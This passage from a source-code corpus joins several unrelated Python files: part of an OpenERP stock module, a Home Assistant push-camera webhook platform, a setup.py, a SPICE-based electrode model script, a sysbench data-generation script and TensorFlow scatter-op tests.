def _default_lot_input_stock_id(self, cr, uid, context=None):
try:
lot_input_stock_model, lot_input_stock_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'stock', 'stock_location_stock')
with tools.mute_logger('openerp.osv.orm'):
self.pool.get('stock.location').check_access_rule(cr, uid, [lot_input_stock_id], 'read', context=context)
except (ValueError, orm.except_orm):
# the user does not have read access on the location or it does not exists
lot_input_stock_id = False
return lot_input_stock_id
def _default_lot_output_id(self, cr, uid, context=None):
try:
lot_output_model, lot_output_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'stock', 'stock_location_output')
with tools.mute_logger('openerp.osv.orm'):
self.pool.get('stock.location').check_access_rule(cr, uid, [lot_output_id], 'read', context=context)
except (ValueError, orm.except_orm):
# the user does not have read access on the location or it does not exists
lot_output_id = False
return lot_output_id
_defaults = {
'company_id': lambda self, cr, uid, c: self.pool.get('res.company')._company_default_get(cr, uid, 'stock.inventory', context=c),
'lot_input_id': _default_lot_input_stock_id,
'lot_stock_id': _default_lot_input_stock_id,
'lot_output_id': _default_lot_output_id,
}
stock_warehouse()
#----------------------------------------------------------
# "Empty" Classes that are used to vary from the original stock.picking (that are dedicated to the internal pickings)
# in order to offer a different usability with different views, labels, available reports/wizards...
#----------------------------------------------------------
class stock_picking_in(osv.osv):
_name = "stock.picking.in"
_inherit = "stock.picking"
_table = "stock_picking"
_description = "Incoming Shipments"
def search(self, cr, user, args, offset=0, limit=None, order=None, context=None, count=False):
return self.pool.get('stock.picking').search(cr, user, args, offset, limit, order, context, count)
def read(self, cr, uid, ids, fields=None, context=None, load='_classic_read'):
return self.pool.get('stock.picking').read(cr, uid, ids, fields=fields, context=context, load=load)
def read_group(self, cr, uid, domain, fields, groupby, offset=0, limit=None, context=None, orderby=False):
return self.pool['stock.picking'].read_group(cr, uid, domain, fields, groupby, offset=offset, limit=limit, context=context, orderby=orderby)
def check_access_rights(self, cr, uid, operation, raise_exception=True):
#override in order to redirect the check of acces rights on the stock.picking object
return self.pool.get('stock.picking').check_access_rights(cr, uid, operation, raise_exception=raise_exception)
def check_access_rule(self, cr, uid, ids, operation, context=None):
#override in order to redirect the check of acces rules on the stock.picking object
return self.pool.get('stock.picking').check_access_rule(cr, uid, ids, operation, context=context)
def _workflow_trigger(self, cr, uid, ids, trigger, context=None):
#override in order to trigger the workflow of stock.picking at the end of create, write and unlink operation
#instead of it's own workflow (which is not existing)
return self.pool.get('stock.picking')._workflow_trigger(cr, uid, ids, trigger, context=context)
def _workflow_signal(self, cr, uid, ids, signal, context=None):
#override in order to fire the workflow signal on given stock.picking workflow instance
#instead of it's own workflow (which is not existing)
return self.pool.get('stock.picking')._workflow_signal(cr, uid, ids, signal, context=context)
def message_post(self, *args, **kwargs):
"""Post the message on stock.picking to be able to see it in the form view when using the chatter"""
return self.pool.get('stock.picking').message_post(*args, **kwargs)
def message_subscribe(self, *args, **kwargs):
"""Send the subscribe action on stock.picking model as it uses _name in request"""
return self.pool.get('stock.picking').message_subscribe(*args, **kwargs)
def message_unsubscribe(self, *args, **kwargs):
"""Send the unsubscribe action on stock.picking model to match with subscribe"""
return self.pool.get('stock.picking').message_unsubscribe(*args, **kwargs)
def default_get(self, cr, uid, fields_list, context=None):
# merge defaults from stock.picking with possible defaults defined on stock.picking.in
defaults = self.pool['stock.picking'].default_get(cr, uid, fields_list, context=context)
in_defaults = super(stock_picking_in, self).default_get(cr, uid, fields_list, context=context)
defaults.update(in_defaults)
return defaults
def copy(self, cr, uid, id, default=None, context=None):
return self.pool['stock.picking'].copy(cr, uid, id, default=default, context=context)
_columns = {
'backorder_id': fields.many2one('stock.picking.in', 'Back Order of', states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}, help="If this shipment was split, then this field links to the shipment which contains the already processed part.", select=True),
'state': fields.selection(
[('draft', 'Draft'),
('auto', 'Waiting Another Operation'),
('confirmed', 'Waiting Availability'),
('assigned', 'Ready to Receive'),
('done', 'Received'),
('cancel', 'Cancelled'),],
'Status', readonly=True, select=True,
help="""* Draft: not confirmed yet and will not be scheduled until confirmed\n
* Waiting Another Operation: waiting for another move to proceed before it becomes automatically available (e.g. in Make-To-Order flows)\n
* Waiting Availability: still waiting for the availability of products\n
* Ready to Receive: products reserved, simply waiting for confirmation.\n
* Received: has been processed, can't be modified or cancelled anymore\n
* Cancelled: has been cancelled, can't be confirmed anymore"""),
}
_defaults = {
'type': 'in',
}
class stock_picking_out(osv.osv):
_name = "stock.picking.out"
_inherit = "stock.picking"
_table = "stock_picking"
_description = "Delivery Orders"
def search(self, cr, user, args, offset=0, limit=None, order=None, context=None, count=False):
return self.pool.get('stock.picking').search(cr, user, args, offset, limit, order, context, count)
def read(self, cr, uid, ids, fields=None, context=None, load='_classic_read'):
return self.pool.get('stock.picking').read(cr, uid, ids, fields=fields, context=context, load=load)
def read_group(self, cr, uid, domain, fields, groupby, offset=0, limit=None, context=None, orderby=False):
return self.pool['stock.picking'].read_group(cr, uid, domain, fields, groupby, offset=offset, limit=limit, context=context, orderby=orderby)
def check_access_rights(self, cr, uid, operation, raise_exception=True):
#override in order to redirect the check of acces rights on the stock.picking object
return self.pool.get('stock.picking').check_access_rights(cr, uid, operation, raise_exception=raise_exception)
def check_access_rule(self, cr, uid, ids, operation, context=None):
#override in order to redirect the check of acces rules on the stock.picking object
return self.pool.get('stock.picking').check_access_rule(cr, uid, ids, operation, context=context)
def _workflow_trigger(self, cr, uid, ids, trigger, context=None):
#override in order to trigger the workflow of stock.picking at the end of create, write and unlink operation
#instead of it's own workflow (which is not existing)
return self.pool.get('stock.picking')._workflow_trigger(cr, uid, ids, trigger, context=context)
def _workflow_signal(self, cr, uid, ids, signal, context=None):
#override in order to fire the workflow signal on given stock.picking workflow instance
#instead of it's own workflow (which is not existing)
return self.pool.get('stock.picking')._workflow_signal(cr, uid, ids, signal, context=context)
def message_post(self, *args, **kwargs):
"""Post the message on stock.picking to be able to see it in the form view when using the chatter"""
return self.pool.get('stock.picking').message_post(*args, **kwargs)
def message_subscribe(self, *args, **kwargs):
"""Send the subscribe action on stock.picking model as it uses _name in request"""
return self.pool.get('stock.picking').message_subscribe(*args, **kwargs)
def message_unsubscribe(self, *args, **kwargs):
"""Send the unsubscribe action on stock.picking model to match with subscribe"""
return self.pool.get('stock.picking').message_unsubscribe(*args, **kwargs)
def default_get(self, cr, uid, fields_list, context=None):
# merge defaults from stock.picking with possible defaults defined on stock.picking.out
defaults = self.pool['stock.picking'].default_get(cr, uid, fields_list, context=context)
out_defaults = super(stock_picking_out, self).default_get(cr, uid, fields_list, context=context)
defaults.update(out_defaults)
return defaults
def copy(self, cr, uid, id, default=None, context=None):
return self.pool['stock.picking'].copy(cr, uid, id, default=default, context=context)
_columns = {
'backorder_id': fields.many2one('stock.picking.out', 'Back Order of', states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}, help="If this shipment was split, then this field links to the shipment which contains the already processed part.", select=True),
'state': fields.selection(
[('draft', 'Draft'),
('auto', 'Waiting Another Operation'),
('confirmed', 'Waiting Availability'),
('assigned', 'Ready to Deliver'),
('done', 'Delivered'),
('cancel', 'Cancelled'),],
'Status', readonly=True, select=True,
help="""* Draft: not confirmed yet and will not be scheduled until confirmed\n
* Waiting Another Operation: waiting for another move to proceed before it becomes automatically available (e.g. in Make-To-Order flows)\n
* Waiting Availability: still waiting for the availability of products\n
* Ready to Deliver: products reserved, simply waiting for confirmation.\n
* Delivered: has been processed, can't be modified or cancelled anymore\n
* Cancelled: has been cancelled, can't be confirmed anymore"""),
}
_defaults = {
'type': 'out',
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| quanvm009/codev7 | openerp/addons/stock/stock.py | Python | agpl-3.0 | 164,671 |
"""Camera platform that receives images through HTTP POST."""
import logging
import asyncio
from collections import deque
from datetime import timedelta
import voluptuous as vol
import aiohttp
import async_timeout
from homeassistant.components.camera import Camera, PLATFORM_SCHEMA,\
STATE_IDLE, STATE_RECORDING
from homeassistant.components.camera.const import DOMAIN
from homeassistant.core import callback
from homeassistant.const import CONF_NAME, CONF_TIMEOUT, CONF_WEBHOOK_ID
from homeassistant.helpers import config_validation as cv
from homeassistant.helpers.event import async_track_point_in_utc_time
import homeassistant.util.dt as dt_util
_LOGGER = logging.getLogger(__name__)
CONF_BUFFER_SIZE = 'buffer'
CONF_IMAGE_FIELD = 'field'
DEFAULT_NAME = "Push Camera"
ATTR_FILENAME = 'filename'
ATTR_LAST_TRIP = 'last_trip'
PUSH_CAMERA_DATA = 'push_camera'
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_BUFFER_SIZE, default=1): cv.positive_int,
vol.Optional(CONF_TIMEOUT, default=timedelta(seconds=5)): vol.All(
cv.time_period, cv.positive_timedelta),
vol.Optional(CONF_IMAGE_FIELD, default='image'): cv.string,
vol.Required(CONF_WEBHOOK_ID): cv.string,
})
async def async_setup_platform(hass, config, async_add_entities,
discovery_info=None):
"""Set up the Push Camera platform."""
if PUSH_CAMERA_DATA not in hass.data:
hass.data[PUSH_CAMERA_DATA] = {}
webhook_id = config.get(CONF_WEBHOOK_ID)
cameras = [PushCamera(hass,
config[CONF_NAME],
config[CONF_BUFFER_SIZE],
config[CONF_TIMEOUT],
config[CONF_IMAGE_FIELD],
webhook_id)]
async_add_entities(cameras)
async def handle_webhook(hass, webhook_id, request):
"""Handle incoming webhook POST with image files."""
try:
with async_timeout.timeout(5, loop=hass.loop):
data = dict(await request.post())
except (asyncio.TimeoutError, aiohttp.web.HTTPException) as error:
_LOGGER.error("Could not get information from POST <%s>", error)
return
camera = hass.data[PUSH_CAMERA_DATA][webhook_id]
if camera.image_field not in data:
_LOGGER.warning("Webhook call without POST parameter <%s>",
camera.image_field)
return
await camera.update_image(data[camera.image_field].file.read(),
data[camera.image_field].filename)
class PushCamera(Camera):
"""The representation of a Push camera."""
def __init__(self, hass, name, buffer_size, timeout, image_field,
webhook_id):
"""Initialize push camera component."""
super().__init__()
self._name = name
self._last_trip = None
self._filename = None
self._expired_listener = None
self._state = STATE_IDLE
self._timeout = timeout
self.queue = deque([], buffer_size)
self._current_image = None
self._image_field = image_field
self.webhook_id = webhook_id
self.webhook_url = \
hass.components.webhook.async_generate_url(webhook_id)
async def async_added_to_hass(self):
"""Call when entity is added to hass."""
self.hass.data[PUSH_CAMERA_DATA][self.webhook_id] = self
try:
self.hass.components.webhook.async_register(DOMAIN,
self.name,
self.webhook_id,
handle_webhook)
except ValueError:
_LOGGER.error("In <%s>, webhook_id <%s> already used",
self.name, self.webhook_id)
@property
def image_field(self):
"""HTTP field containing the image file."""
return self._image_field
@property
def state(self):
"""Return current state of the camera."""
return self._state
async def update_image(self, image, filename):
"""Update the camera image."""
if self._state == STATE_IDLE:
self._state = STATE_RECORDING
self._last_trip = dt_util.utcnow()
self.queue.clear()
self._filename = filename
self.queue.appendleft(image)
@callback
def reset_state(now):
"""Set state to idle after no new images for a period of time."""
self._state = STATE_IDLE
self._expired_listener = None
_LOGGER.debug("Reset state")
self.async_schedule_update_ha_state()
if self._expired_listener:
self._expired_listener()
self._expired_listener = async_track_point_in_utc_time(
self.hass, reset_state, dt_util.utcnow() + self._timeout)
self.async_schedule_update_ha_state()
async def async_camera_image(self):
"""Return a still image response."""
if self.queue:
if self._state == STATE_IDLE:
self.queue.rotate(1)
self._current_image = self.queue[0]
return self._current_image
@property
def name(self):
"""Return the name of this camera."""
return self._name
@property
def motion_detection_enabled(self):
"""Camera Motion Detection Status."""
return False
@property
def device_state_attributes(self):
"""Return the state attributes."""
return {
name: value for name, value in (
(ATTR_LAST_TRIP, self._last_trip),
(ATTR_FILENAME, self._filename),
) if value is not None
}
| MartinHjelmare/home-assistant | homeassistant/components/push/camera.py | Python | apache-2.0 | 5,809 |
#!/usr/bin/env python3
# coding: utf-8
"""Plotting and analysis tools for the ARTIS 3D supernova radiative transfer code."""
import datetime
import os
import sys
from setuptools import find_packages, setup
from setuptools.command.test import test as TestCommand
from artistools import console_scripts
class PyTest(TestCommand):
"""Setup the py.test test runner."""
def finalize_options(self):
"""Set options for the command line."""
TestCommand.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
"""Execute the test runner command."""
# Import here, because outside the required eggs aren't loaded yet
import pytest
sys.exit(pytest.main(self.test_args))
print(datetime.datetime.now().isoformat())
setup(
name="artistools",
version="0.1.dev0",
# version=datetime.datetime.now().isoformat(),
author="Luke Shingles",
author_email="[email protected]",
packages=find_packages(),
url="https://www.github.com/lukeshingles/artistools/",
license="MIT",
description="Plotting and analysis tools for the ARTIS 3D supernova radiative transfer code.",
long_description=open(
os.path.join(os.path.dirname(__file__), "README.md")).read(),
install_requires=open(
os.path.join(os.path.dirname(__file__), "requirements.txt")).read(),
entry_points={
'console_scripts': console_scripts
},
python_requires='>==3.8',
# test_suite='tests',
setup_requires=['coveralls', 'pytest', 'pytest-runner', 'pytest-cov'],
tests_require=['coveralls', 'pytest', 'pytest-runner', 'pytest-cov'],
include_package_data=True)
| lukeshingles/artistools | setup.py | Python | mit | 1,709 |
import lib.solutions.pbs.modelParameters as parameters
import lib.interface
import lib.spice
import lib.files.measurements
import lib.plot.formatter
import scipy.optimize
import matplotlib.pyplot as plt
import numpy as np
import time
import sys
import math
#==============================================================================
# Measurement Notes
#==============================================================================
# When the E5270 increments its output voltage it does so like a capacitor
# charging. A sufficient approximation suitable for simulation would to be
# to assume a linear rise by the 50mV in 500e-6 seconds.
print("This file has been kept for archive purposes, but does not function in its current state")
sys.exit()
def toImpedance(voltage, current):
return map(lambda (voltage, current): voltage / current,
zip(voltage, current))
class PBSParameterSet(object):
concentration = None
i0 = 3.5e-9
n = 1.0
i0_scaler = 1.0
n_scaler = 1.0
def __init__(self, concentration):
self.concentration = concentration
self.conductivity()
def conductivity(self):
"""
Converts a concentration of PBS into a conductivity according to a
least squares fit of the solutions used
"""
m = 1.67296736e-02 # Determined from optimisation
c = 8.54665149e-05 # Determined from optimisation
return m * self.concentration + c
def ladder_Resistor_RadialElectrode(self):
return 0.407 / self.conductivity()
def ladder_Resistor_RadialInsulator(self):
return self.ladder_Resistor_RadialElectrode() * (3.0 / 4.0)
def ladder_Resistor_LongitudinalCommence(self):
return 3.71 / self.conductivity()
def displacement_m(self):
return 1.34
def displacement_k(self):
return 1.773
def displacement_mag(self):
"""
The value of the CPE impedance magnitude at 1Hz
"""
return 3284 * math.pow(self.concentration, -0.158)
def displacement_slope(self):
return -0.79052566
def faradaic_CM(self):
return None
def faradaic_RM(self):
return None
def faradaic_i0(self):
return self.i0 * self.i0_scaler
def faradaic_n(self):
return self.n * self.n_scaler
def seriesResistance(self):
"""
Model series resistance or Rs as it is called in the paper.
"""
return 13.38 * math.pow(self.concentration, -0.8397)
def temperature(self):
return 20.0
def simulate_PBS_CPE(concentration, frequencies):
#==========================================================================
# Create the model
#==========================================================================
pbs_parameters = parameters.ParameterSet(concentration)
interfaceModel = lib.interface.Model(pbs_parameters)
spice_ckt = interfaceModel.get_spiceModel()
spice_ckt.append('R_in 1 e2 0')
spice_ckt.append('R_out 0 e7 0')
spice_ckt.append('V1 1 0 DC 0 AC 1')
#==========================================================================
# Simulate the circuit
#==========================================================================
simulator = lib.spice.Simulator()
analysis = ('AC lin 1', frequencies)
# analysis = 'AC DEC 10 0.05 10000'
measurements = [simulator.Measurement('v(e7,e6)', 'voltage'),
simulator.Measurement('i(V1)', 'current')]
results = simulator.simulate(spice_ckt,
analysis,
measurements)
#==========================================================================
# Process results
#==========================================================================
return (results['frequency'], toImpedance(results['voltage'],
results['current']))
def build_peasewiseLinear(sampleConc):
data = np.load('measurements/pbs/faradaic/diode/dilutionRun/' + str(sampleConc) + 'X-PBS_64s_stirred.npy')
pieces = []
lastVoltage = data['voltage'][0]
for row in data:
if round(row['voltage'], 3) >= 1.05:
break
elif row['voltage'] != lastVoltage:
print row['voltage']
pieces.append((row['time'] - 1, round(lastVoltage, 2)))
pieces.append((row['time'], round(row['voltage'], 2)))
lastVoltage = row['voltage']
return pieces
linearPieces = None
def simulate_PBS_Faradaic(pbs_parameters):
global linearPieces
#==========================================================================
# Create the model
#==========================================================================
if pbs_parameters is False:
print 'loading default parameters'
pbs_parameters = PBSParameterSet(1.0)
concentration = pbs_parameters.concentration
interfaceModel = lib.interface.Model(pbs_parameters)
spice_ckt = interfaceModel.get_spiceModel()
spice_ckt.append('R_in 1 e7 0')
spice_ckt.append('R_out 0 e2 0')
line = 'V1 1 0 DC 0 PWL('
if linearPieces is None:
linearPieces = build_peasewiseLinear(concentration)
for piece in linearPieces:
line += str(piece[0]) + ' ' + str(piece[1]) + ' '
line += ')'
spice_ckt.append(line)
#==========================================================================
# Simulate the circuit
#==========================================================================
simulator = lib.spice.Simulator()
analysis = 'TRAN ' + str(1) + ' 651 0'
# analysis = 'AC DEC 10 0.05 10000'
measurements = [simulator.Measurement('v(e7,e2)', 'voltage'),
simulator.Measurement('i(V1)', 'current')]
results = simulator.simulate(spice_ckt,
analysis,
measurements,
timeout=60)
#==========================================================================
# Process results
#==========================================================================
return (list(results['time']), map(lambda x:-x, list(results['current'])))
def compare_Sim_Meas_CPE():
concentrations = [1.0, 0.5, 0.25, 0.1, 0.05, 0.025]
for concentration in concentrations:
data = lib.files.measurements.get('displacement', concentration)
plt.scatter(data['frequency'], map(abs, data['impedance']))
frequencies = list(data['frequency'])
for concentration in concentrations:
frequency, impedance = simulate_PBS_CPE(concentration, frequencies)
plt.plot(frequency, map(abs, impedance), marker='s', markersize=3)
plt.gca().set_xscale('log')
plt.gca().set_yscale('log')
plt.show()
def compare_Sim_Meas_Faradaic(parameters):
concentration = parameters.concentration
sim_time, sim_current = simulate_PBS_Faradaic(parameters)
sim_time = map(lambda x: int(round(x)), sim_time)
xs_sim = []
ys_sim = []
for (x, y) in zip(sim_time, sim_current):
if x > 195 and x not in xs_sim:
xs_sim.append(x)
ys_sim.append(y)
data = np.load('measurements/pbs/faradaic/diode/dilutionRun/' + str(concentration) + 'X-PBS_64s_stirred.npy')
xs_meas = []
ys_meas = []
for row in data:
if row['time'] > 651:
break
elif row['time'] > 195:
xs_meas.append(row['time'])
ys_meas.append(row['current'])
return (xs_sim, ys_sim, xs_meas, ys_meas)
def filter_Sim_Meas_Faradaic(args):
points = [196 + x * 65 for x in range(8)]
xs_sim, ys_sim, xs_meas, ys_meas = args
xs = points
ys_out_meas = map(lambda x: ys_meas[xs_meas.index(x)], points)
ys_out_sim = map(lambda x: ys_sim[xs_sim.index(x)], points)
return (xs, ys_out_sim, xs, ys_out_meas)
def residuals_Sim_Meas_Faradaic(args):
xs_sim, ys_sim, xs_meas, ys_meas = args
out = []
for sim, meas in zip(ys_sim, ys_meas):
out.append((meas - sim))
return out
def plot_Sim_Meas_Faradaic():
concentrations = [1.0]
for concentration in concentrations:
xs_sim, ys_sim, xs_meas, ys_meas = compare_Sim_Meas_Faradaic(concentration)
plt.plot(xs_sim, ys_sim)
plt.scatter(xs_meas, ys_meas)
plt.show()
def residuals(p, pbs_parameters):
pbs_parameters.n = p[0]
pbs_parameters.i0 = p[1]
result = residuals_Sim_Meas_Faradaic(filter_Sim_Meas_Faradaic(compare_Sim_Meas_Faradaic(pbs_parameters)))
print p, sum(map(abs, result))
return sum(map(abs, result))
# return sum(map(abs, result))
#==============================================================================
# Manual Sweep
#==============================================================================
# n_min = 0.3
# n_max = 5.0
# i0_min = 1e-12
# i0_min = math.log10(i0_min)
# i0_max = 1e-3
# i0_max = math.log10(i0_max)
#
# pts = 50
#
# pbs_parameters = PBSParameterSet(1.0)
# ns = list(np.linspace(n_min, n_max, pts))
# i0s = list(np.logspace(i0_min, i0_max, pts))
# with open('nI0Data.csv', 'w') as f:
# for n in ns:
# for i0 in i0s:
# pbs_parameters.n = n
# pbs_parameters.i0 = i0
# try:
# result = residuals([n, i0], pbs_parameters)
# f.write(str(n) + ', ' + str(i0) + ', ' + str(result) + '\n')
# except IOError:
# f.write(str(n) + ', ' + str(i0) + ', 1.234\n')
#==============================================================================
# Optimisation
#==============================================================================
myBounds = [(1e-12, 1e-3), (0.1, 2.0)]
x0 = (1e-7, 1.0)
pbs_parameters = PBSParameterSet(1.0)
optParams = {'n': 1.0,
'i0': 1.0}
pbs_parameters.i0_scaler = optParams['i0']
pbs_parameters.n_scaler = optParams['n']
optimisedParams = scipy.optimize.fmin_l_bfgs_b(residuals,
x0=(3.0, 3.0),
approx_grad=True,
args=[pbs_parameters],
epsilon=0.01,
bounds=myBounds,
maxfun=60)
print optimisedParams
sys.exit()
while True:
for param in ['n', 'i0']:
if param == 'i0':
pbs_parameters.n_scaler = optParams['n']
bounds = [(1e-12, 1e-3)]
epsilon = 2.0
elif param == 'n':
pbs_parameters.i0_scaler = optParams['i0']
bounds = [(0.1, 3.0)]
epsilon = 2.0
optimisedParams = scipy.optimize.leastsq(residuals,
x0=[optParams[param]],
args=[pbs_parameters, param])
# optimisedParams = scipy.optimize.fmin_l_bfgs_b(residuals,
# x0=[optParams[param]],
# approx_grad=True,
# args=[pbs_parameters, param],
# epsilon=epsilon,
# bounds=bounds,
# pgtol=1e-10,
# maxfun=60)
print 'setting optparams[' + param + '] to ' + str(optimisedParams[0][0])
optParams[param] = optimisedParams[0][0]
print optimisedParams
# filter_Sim_Meas_Faradaic(compare_Sim_Meas_Faradaic(1.0))
| MarkHedleyJones/Electrode_Interface_Model | model.py | Python | mit | 11,822 |
#! /usr/bin/python
import subprocess, argparse
import logging, sys
#Usage python generateData.py allConfigurationsFile begin_configuration_index ram_value ram_level_value resultFileWithPath iterations
#
def writeToFile(i, user, j, time_now, f1,f2,f3,f4,f5,f6,r1,f_output):
# ram, cpu_freq, cpu_freq_governor, num_cores, disc_io, dirty_ratio
f_output.write(i+',' +user +',' + j +',' +time_now+',' + f1 + ',' + f2 + ',' + f3+ ',' + f4+ ',' + f5+ ',' +f6+ ',' + r1 + '\n')
f_output.flush()
if __name__ == "__main__":
logging.basicConfig(filename='generate_Data.log',level=logging.DEBUG,format='%(asctime)s %(message)s')
logging.info('New Data Generation started!!')
__doc__ = ""
epi = ""
parser = argparse.ArgumentParser(description=__doc__, epilog= epi)
parser.add_argument('allConfigurationsFile', action='store',
help=(''))
parser.add_argument('begin_configuration_index', action='store',
help=(''))
parser.add_argument('ram_value',action='store',help=(''))
parser.add_argument('ram_level_value',action='store',help=(''))
parser.add_argument('resultFileWithPath',action='store',help=(''))
parser.add_argument('iterations',action='store',help=(''))
args = parser.parse_args()
logging.info('%s %s %s %s %s %s',args.allConfigurationsFile,args.begin_configuration_index,args.ram_value,args.ram_value,args.resultFileWithPath,args.iterations)
cpu_min_freq = "800000"
f_output= open(args.resultFileWithPath,'w')
f_configListFile = open(args.allConfigurationsFile,'r')
for i,line in enumerate(f_configListFile):
if i >= int(args.begin_configuration_index)-1 :
line = line.rstrip('\n')
factor_values = line.split(":")[0:5]
line = next(f_configListFile)
factor_levels = line.split(":")[0:5]
#Usage: python configureSystem.py number_of_cores (1/3) cpu_min_freq cpu_max_freq governor io_scheduler_algo dirty_ratio
cmd_configure = "python configureSystem.py "+ factor_values[2] +" " + cpu_min_freq + " " + factor_values[0] + " " + factor_values[1] + " " + factor_values[3] + " " + factor_values[4]
logging.info('Calling configure System with parameters %s %s %s %s %s %s',factor_values[2],cpu_min_freq,factor_values[0], factor_values[1], factor_values[3], factor_values[4] )
subprocess.call(cmd_configure,shell=True)
cmd_user = "uname -n"
user = subprocess.check_output(cmd_user,shell=True).rstrip('\n')
for j in range(1, int(args.iterations)+1):
logging.info('Calling benchmark :' + int(j))
#Run benchmark script
cmd_benchmark = "python sysbench_benchmark.py"
result= subprocess.check_output(cmd_benchmark,shell=True).rstrip('\n')
cmd_date = "date"
time_now = subprocess.check_output(cmd_date,shell=True).rstrip('\n')
writeToFile(str(i), user, str(j), time_now, str(args.ram_level_value),factor_levels[0],factor_levels[1],factor_levels[2],factor_levels[3],factor_levels[4],str(result),f_output)
f_output.close()
f_configListFile.close()
| KajuBadaam/performance-meter | generateData.py | Python | gpl-2.0 | 2,985 |
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.tf.scatter."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
def _AsType(v, vtype):
return v.astype(vtype) if isinstance(v, np.ndarray) else vtype(v)
def _NumpyAdd(ref, indices, updates):
# Since numpy advanced assignment does not support repeated indices,
# we run a simple loop to perform scatter_add.
for i, indx in np.ndenumerate(indices):
ref[indx] += updates[i]
def _NumpyAddScalar(ref, indices, update):
for _, indx in np.ndenumerate(indices):
ref[indx] += update
def _NumpySub(ref, indices, updates):
for i, indx in np.ndenumerate(indices):
ref[indx] -= updates[i]
def _NumpySubScalar(ref, indices, update):
for _, indx in np.ndenumerate(indices):
ref[indx] -= update
def _NumpyMul(ref, indices, updates):
for i, indx in np.ndenumerate(indices):
ref[indx] *= updates[i]
def _NumpyMulScalar(ref, indices, update):
for _, indx in np.ndenumerate(indices):
ref[indx] *= update
def _NumpyDiv(ref, indices, updates):
for i, indx in np.ndenumerate(indices):
ref[indx] /= updates[i]
def _NumpyDivScalar(ref, indices, update):
for _, indx in np.ndenumerate(indices):
ref[indx] /= update
def _NumpyMin(ref, indices, updates):
for i, indx in np.ndenumerate(indices):
ref[indx] = np.minimum(ref[indx], updates[i])
def _NumpyMinScalar(ref, indices, update):
for _, indx in np.ndenumerate(indices):
ref[indx] = np.minimum(ref[indx], update)
def _NumpyMax(ref, indices, updates):
for i, indx in np.ndenumerate(indices):
ref[indx] = np.maximum(ref[indx], updates[i])
def _NumpyMaxScalar(ref, indices, update):
for _, indx in np.ndenumerate(indices):
ref[indx] = np.maximum(ref[indx], update)
def _NumpyUpdate(ref, indices, updates):
for i, indx in np.ndenumerate(indices):
ref[indx] = updates[i]
def _NumpyUpdateScalar(ref, indices, update):
for _, indx in np.ndenumerate(indices):
ref[indx] = update
_TF_OPS_TO_NUMPY = {
state_ops.scatter_update: _NumpyUpdate,
state_ops.scatter_add: _NumpyAdd,
state_ops.scatter_sub: _NumpySub,
state_ops.scatter_mul: _NumpyMul,
state_ops.scatter_div: _NumpyDiv,
state_ops.scatter_min: _NumpyMin,
state_ops.scatter_max: _NumpyMax,
}
_TF_OPS_TO_NUMPY_SCALAR = {
state_ops.scatter_update: _NumpyUpdateScalar,
state_ops.scatter_add: _NumpyAddScalar,
state_ops.scatter_sub: _NumpySubScalar,
state_ops.scatter_mul: _NumpyMulScalar,
state_ops.scatter_div: _NumpyDivScalar,
state_ops.scatter_min: _NumpyMinScalar,
state_ops.scatter_max: _NumpyMaxScalar,
}
class ScatterTest(test.TestCase):
def _VariableRankTest(self,
tf_scatter,
vtype,
itype,
repeat_indices=False,
updates_are_scalar=False):
np.random.seed(8)
with self.cached_session(use_gpu=True):
for indices_shape in (), (2,), (3, 7), (3, 4, 7):
for extra_shape in (), (5,), (5, 9):
# Generate random indices with no duplicates for easy numpy comparison
size = np.prod(indices_shape, dtype=itype)
first_dim = 3 * size
indices = np.arange(first_dim)
np.random.shuffle(indices)
indices = indices[:size]
if size > 1 and repeat_indices:
# Add some random repeats.
indices = indices[:size // 2]
for _ in range(size - size // 2):
# Randomly append some repeats.
indices = np.append(indices,
indices[np.random.randint(size // 2)])
np.random.shuffle(indices)
indices = indices.reshape(indices_shape)
if updates_are_scalar:
updates = _AsType(np.random.randn(), vtype)
else:
updates = _AsType(
np.random.randn(*(indices_shape + extra_shape)), vtype)
# Clips small values to avoid division by zero.
def clip_small_values(x):
threshold = 1e-4
sign = np.sign(x)
if isinstance(x, np.int32):
threshold = 1
sign = np.random.choice([-1, 1])
return threshold * sign if np.abs(x) < threshold else x
updates = np.vectorize(clip_small_values)(updates)
old = _AsType(np.random.randn(*((first_dim,) + extra_shape)), vtype)
# Scatter via numpy
new = old.copy()
if updates_are_scalar:
np_scatter = _TF_OPS_TO_NUMPY_SCALAR[tf_scatter]
else:
np_scatter = _TF_OPS_TO_NUMPY[tf_scatter]
np_scatter(new, indices, updates)
# Scatter via tensorflow
ref = variables.VariableV1(old)
ref.initializer.run()
tf_scatter(ref, indices, updates).eval()
self.assertAllClose(ref.eval(), new)
def _VariableRankTests(self,
tf_scatter,
repeat_indices=False,
updates_are_scalar=False):
vtypes = [np.float32, np.float64]
if tf_scatter != state_ops.scatter_div:
vtypes.append(np.int32)
for vtype in vtypes:
for itype in (np.int32, np.int64):
self._VariableRankTest(tf_scatter, vtype, itype, repeat_indices,
updates_are_scalar)
def testVariableRankUpdate(self):
self._VariableRankTests(state_ops.scatter_update, False)
def testVariableRankAdd(self):
self._VariableRankTests(state_ops.scatter_add, False)
def testVariableRankSub(self):
self._VariableRankTests(state_ops.scatter_sub, False)
def testVariableRankMul(self):
self._VariableRankTests(state_ops.scatter_mul, False)
def testVariableRankDiv(self):
self._VariableRankTests(state_ops.scatter_div, False)
def testVariableRankMin(self):
self._VariableRankTests(state_ops.scatter_min, False)
def testVariableRankMax(self):
self._VariableRankTests(state_ops.scatter_max, False)
